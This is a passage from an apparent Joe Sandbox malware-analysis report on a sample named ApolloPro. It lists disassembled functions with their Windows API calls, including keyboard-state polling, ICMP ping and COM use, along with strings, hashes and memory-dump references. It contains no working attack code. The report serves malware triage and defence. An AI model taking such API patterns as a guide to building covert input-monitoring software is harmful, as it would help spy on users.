                                                                                              • Opcode ID: afa270de74c2b135739f1a7eb82acd2848e079dcd5344d4710ce433b2b2d71f6
                                                                                              • Instruction ID: 2f79d71458453a9d7b21ce1017ef27b5d622192162c3b1acf31cb25512f83164
                                                                                              • Opcode Fuzzy Hash: afa270de74c2b135739f1a7eb82acd2848e079dcd5344d4710ce433b2b2d71f6
                                                                                              • Instruction Fuzzy Hash: B1413AB4A00209EFEB10DF64D988EEA7BB6FF89350F144029F955A73A0D731A950DF50
                                                                                              Function 006B7AE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 006B7B83
                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 006B7B8A
                                                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 006B7B9D
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 006B7BA5
                                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 006B7BB0
                                                                                              • DeleteDC.GDI32(00000000), ref: 006B7BB9
                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 006B7BC3
                                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 006B7BD7
                                                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 006B7BE3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                              • String ID: static
                                                                                              • API String ID: 2559357485-2160076837
                                                                                              • Opcode ID: 7e67d89be6861e4eb41fa7662fd74c4ac96957d87f62687623529515d436654d
                                                                                              • Instruction ID: 60753e6135510caca3b77d2d37a19a22549f783a8ee45003c1f1ec77ef8285ec
                                                                                              • Opcode Fuzzy Hash: 7e67d89be6861e4eb41fa7662fd74c4ac96957d87f62687623529515d436654d
                                                                                              • Instruction Fuzzy Hash: 94318972104219EBEF119FA4DC49FEB3B6AFF49324F111215FA55A62A0C731E860DBA4
                                                                                              Function 00657030 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 0065706B
                                                                                                • Part of subcall function 00658D58: __getptd_noexit.LIBCMT ref: 00658D58
                                                                                              • __gmtime64_s.LIBCMT ref: 00657104
                                                                                              • __gmtime64_s.LIBCMT ref: 0065713A
                                                                                              • __gmtime64_s.LIBCMT ref: 00657157
                                                                                              • __allrem.LIBCMT ref: 006571AD
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006571C9
                                                                                              • __allrem.LIBCMT ref: 006571E0
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006571FE
                                                                                              • __allrem.LIBCMT ref: 00657215
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00657233
                                                                                              • __invoke_watson.LIBCMT ref: 006572A4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                              • String ID:
                                                                                              • API String ID: 384356119-0
                                                                                              • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                                              • Instruction ID: 2c60db9f0decb3cafeecf9075ce0ad167f230bbd5e3313ce4386e8ab463ff706
                                                                                              • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                                              • Instruction Fuzzy Hash: 487136B1A04717ABD7149E79EC41B9AB3EAAF10321F14422EFC14E77C1EB70DA488794
                                                                                              Function 00692CCE Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00692CE9
                                                                                              • GetMenuItemInfoW.USER32(006F7890,000000FF,00000000,00000030), ref: 00692D4A
                                                                                              • SetMenuItemInfoW.USER32(006F7890,00000004,00000000,00000030), ref: 00692D80
                                                                                              • Sleep.KERNEL32(000001F4), ref: 00692D92
                                                                                              • GetMenuItemCount.USER32(?), ref: 00692DD6
                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 00692DF2
                                                                                              • GetMenuItemID.USER32(?,-00000001), ref: 00692E1C
                                                                                              • GetMenuItemID.USER32(?,?), ref: 00692E61
                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00692EA7
                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00692EBB
                                                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00692EDC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                              • String ID:
                                                                                              • API String ID: 4176008265-0
                                                                                              • Opcode ID: 1383317a0985e8988b3087f18e4861bea5aeb64b2e8d8c3a1e6b05956b65a1a3
                                                                                              • Instruction ID: 6b4270d5adfda1eb77e288feba88b1c911f7734b217ecb46dd62eab322ddcbc0
                                                                                              • Opcode Fuzzy Hash: 1383317a0985e8988b3087f18e4861bea5aeb64b2e8d8c3a1e6b05956b65a1a3
                                                                                              • Instruction Fuzzy Hash: 2861587090024ABFEF21DF64D9A8EFEBBBEEB45304F144459E841A7651D731AE06DB20
                                                                                              Function 006B7548 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 006B75CA
                                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 006B75CD
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 006B75F1
                                                                                              • _memset.LIBCMT ref: 006B7602
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 006B7614
                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 006B768C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$LongWindow_memset
                                                                                              • String ID:
                                                                                              • API String ID: 830647256-0
                                                                                              • Opcode ID: ca9bb9da342f11f07acfaf33713c75bbf655963275119c7760b9a8e3bc602f61
                                                                                              • Instruction ID: 50bcf3e3433e2a41dc30c0c815e87e2a8d109d350f3b56a14c6341466538561d
                                                                                              • Opcode Fuzzy Hash: ca9bb9da342f11f07acfaf33713c75bbf655963275119c7760b9a8e3bc602f61
                                                                                              • Instruction Fuzzy Hash: A5616BB5904208AFDB10DFA4CC85EEE77F9EB49710F1041A9FA14A73A1D770AE81DB60
                                                                                              Function 006877B6 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 006877DD
                                                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00687836
                                                                                              • VariantInit.OLEAUT32(?), ref: 00687848
                                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00687868
                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 006878BB
                                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 006878CF
                                                                                              • VariantClear.OLEAUT32(?), ref: 006878E4
                                                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 006878F1
                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006878FA
                                                                                              • VariantClear.OLEAUT32(?), ref: 0068790C
                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00687917
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                              • String ID:
                                                                                              • API String ID: 2706829360-0
                                                                                              • Opcode ID: 0d2bd506646846ff854bc10309435c37d8405e972936f48e097e554fa1432957
                                                                                              • Instruction ID: 7d7b31ab4cb4a91f4648fbb6e15de92e4d8984ad5e6cc80ed74979f3afe42656
                                                                                              • Opcode Fuzzy Hash: 0d2bd506646846ff854bc10309435c37d8405e972936f48e097e554fa1432957
                                                                                              • Instruction Fuzzy Hash: 3D414F75A04119DFDB04EFA4D848DAEBBBAFF48300F10C169E955A7261CB30EA45CFA0
                                                                                              Function 00690508 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetKeyboardState.USER32(?), ref: 00690530
                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 006905B1
                                                                                              • GetKeyState.USER32(000000A0), ref: 006905CC
                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 006905E6
                                                                                              • GetKeyState.USER32(000000A1), ref: 006905FB
                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 00690613
                                                                                              • GetKeyState.USER32(00000011), ref: 00690625
                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 0069063D
                                                                                              • GetKeyState.USER32(00000012), ref: 0069064F
                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00690667
                                                                                              • GetKeyState.USER32(0000005B), ref: 00690679
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: State$Async$Keyboard
                                                                                              • String ID:
                                                                                              • API String ID: 541375521-0
                                                                                              • Opcode ID: 0354344bda3786852ed35efb9cea9d67ba9197caf949e85e780101a7f6eafb52
                                                                                              • Instruction ID: b7f135d3ecd1d71fa0d835c83f09d46f0bb4425c29d2561df8c5f2cad5d56332
                                                                                              • Opcode Fuzzy Hash: 0354344bda3786852ed35efb9cea9d67ba9197caf949e85e780101a7f6eafb52
                                                                                              • Instruction Fuzzy Hash: 3D41EB345047C96DFF30976489047F5BEAB6B51304F48405AD9C587BC1EBA499D4CFA2
                                                                                              Function 006A8AA5 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00634D37: __itow.LIBCMT ref: 00634D62
                                                                                                • Part of subcall function 00634D37: __swprintf.LIBCMT ref: 00634DAC
                                                                                              • CoInitialize.OLE32 ref: 006A8AED
                                                                                              • CoUninitialize.OLE32 ref: 006A8AF8
                                                                                              • CoCreateInstance.OLE32(?,00000000,00000017,006C3BBC,?), ref: 006A8B58
                                                                                              • IIDFromString.OLE32(?,?), ref: 006A8BCB
                                                                                              • VariantInit.OLEAUT32(?), ref: 006A8C65
                                                                                              • VariantClear.OLEAUT32(?), ref: 006A8CC6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                              • API String ID: 834269672-1287834457
                                                                                              • Opcode ID: e688fbac5a4290afc38904f7eacd5e247da3b7bb1f828a5f55e2b41496ebcd51
                                                                                              • Instruction ID: b427f0a20f76ee78dd982c714378fa1bf35cafe5cc91f68d6f0384020ae7eb13
                                                                                              • Opcode Fuzzy Hash: e688fbac5a4290afc38904f7eacd5e247da3b7bb1f828a5f55e2b41496ebcd51
                                                                                              • Instruction Fuzzy Hash: 1561AD702097119FD710EF14C888F6AB7EAAF46714F00485DF9829B291DB70ED49CFA6
                                                                                              Function 006A5E1D Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WSAStartup.WSOCK32(00000101,?), ref: 006A5E7E
                                                                                              • inet_addr.WSOCK32(?,?,?), ref: 006A5EC3
                                                                                              • gethostbyname.WSOCK32(?), ref: 006A5ECF
                                                                                              • IcmpCreateFile.IPHLPAPI ref: 006A5EDD
                                                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 006A5F4D
                                                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 006A5F63
                                                                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 006A5FD8
                                                                                              • WSACleanup.WSOCK32 ref: 006A5FDE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                              • String ID: Ping
                                                                                              • API String ID: 1028309954-2246546115
                                                                                              • Opcode ID: c537ce954798093ba0cfc3839f77be2db4ee7af9ffef01fa0d36c23acd3559fd
                                                                                              • Instruction ID: f28a873759ff4b9fc613d20254d02288afc467b09caeac5b3a25448b71e4b97a
                                                                                              • Opcode Fuzzy Hash: c537ce954798093ba0cfc3839f77be2db4ee7af9ffef01fa0d36c23acd3559fd
                                                                                              • Instruction Fuzzy Hash: 1B5169316046019FDB60EF24CC89F6AB7E6AF49710F144929F996DB2A1DB70ED01CF52
                                                                                              Function 0069BB06 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0069BB13
                                                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0069BB89
                                                                                              • GetLastError.KERNEL32 ref: 0069BB93
                                                                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 0069BC00
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                              • API String ID: 4194297153-14809454
                                                                                              • Opcode ID: 5f8e673643d67a877bd0a163df7f57c88355899f1eca4cbbdb5510f14e3804fd
                                                                                              • Instruction ID: a26df7e5065f2f5ee149a885474573e2f1a973efee44858666f8b3c30491f80a
                                                                                              • Opcode Fuzzy Hash: 5f8e673643d67a877bd0a163df7f57c88355899f1eca4cbbdb5510f14e3804fd
                                                                                              • Instruction Fuzzy Hash: 7F31C335A002099FCF10DF69D985EFEB7BAEF44310F14915AE405976D9DF709942CB90
                                                                                              Function 006934DD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 82windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadIconW.USER32(00000000,00007F03), ref: 0069357C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconLoad
                                                                                              • String ID: ,zo0zo$,zo0zo$blank$info$question$stop$warning
                                                                                              • API String ID: 2457776203-3742973295
                                                                                              • Opcode ID: af35fe8a20076542ac65a9a82d8c85023ccbae3fa68cac70a73ea27e62c8a8d0
                                                                                              • Instruction ID: 6d7b5f1773b7ca321f3a8ff3a4382e51993d8264ac5482e2257b9f5b6c1d5c49
                                                                                              • Opcode Fuzzy Hash: af35fe8a20076542ac65a9a82d8c85023ccbae3fa68cac70a73ea27e62c8a8d0
                                                                                              • Instruction Fuzzy Hash: 15112771609766BEEF144B25DC82CEB77DEDF0A7B0F21002EFA00A6781E7646F4046A4
                                                                                              Function 00689B47 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
                                                                                                • Part of subcall function 0068B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0068B7BD
                                                                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00689BCC
                                                                                              • GetDlgCtrlID.USER32 ref: 00689BD7
                                                                                              • GetParent.USER32 ref: 00689BF3
                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00689BF6
                                                                                              • GetDlgCtrlID.USER32(?), ref: 00689BFF
                                                                                              • GetParent.USER32(?), ref: 00689C1B
                                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00689C1E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 1536045017-1403004172
                                                                                              • Opcode ID: 1799c2c36c50042bb551928b1814c3ba17a1abf34a28e7908649b8d9502c9d12
                                                                                              • Instruction ID: 53d99a557cfc9665ca3b643df83b6e248b05b7a390f3ea0bfb8ca38d6f0b989e
                                                                                              • Opcode Fuzzy Hash: 1799c2c36c50042bb551928b1814c3ba17a1abf34a28e7908649b8d9502c9d12
                                                                                              • Instruction Fuzzy Hash: 1321C170900208ABDF04AFA1CC85EFEBBB6EF9A310F14021AF961972D1DB7958559B20
                                                                                              Function 00689C32 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
                                                                                                • Part of subcall function 0068B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0068B7BD
                                                                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00689CB5
                                                                                              • GetDlgCtrlID.USER32 ref: 00689CC0
                                                                                              • GetParent.USER32 ref: 00689CDC
                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00689CDF
                                                                                              • GetDlgCtrlID.USER32(?), ref: 00689CE8
                                                                                              • GetParent.USER32(?), ref: 00689D04
                                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00689D07
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 1536045017-1403004172
                                                                                              • Opcode ID: 11db5f32b9b348e1b886fc420503e59a1f4999be728f48ad0d9acdc5fc8e3c8f
                                                                                              • Instruction ID: d431bd5433d48f5517325690e880ab6f81082384efcc6f0d833d23b16afd1d72
                                                                                              • Opcode Fuzzy Hash: 11db5f32b9b348e1b886fc420503e59a1f4999be728f48ad0d9acdc5fc8e3c8f
                                                                                              • Instruction Fuzzy Hash: 6521D371E00208BFDF00AFA1CC85EFEBBBAEF96300F140216F95197291DB7999559B24
                                                                                              Function 00689D1B Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetParent.USER32 ref: 00689D27
                                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00689D3C
                                                                                              • _wcscmp.LIBCMT ref: 00689D4E
                                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00689DC9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
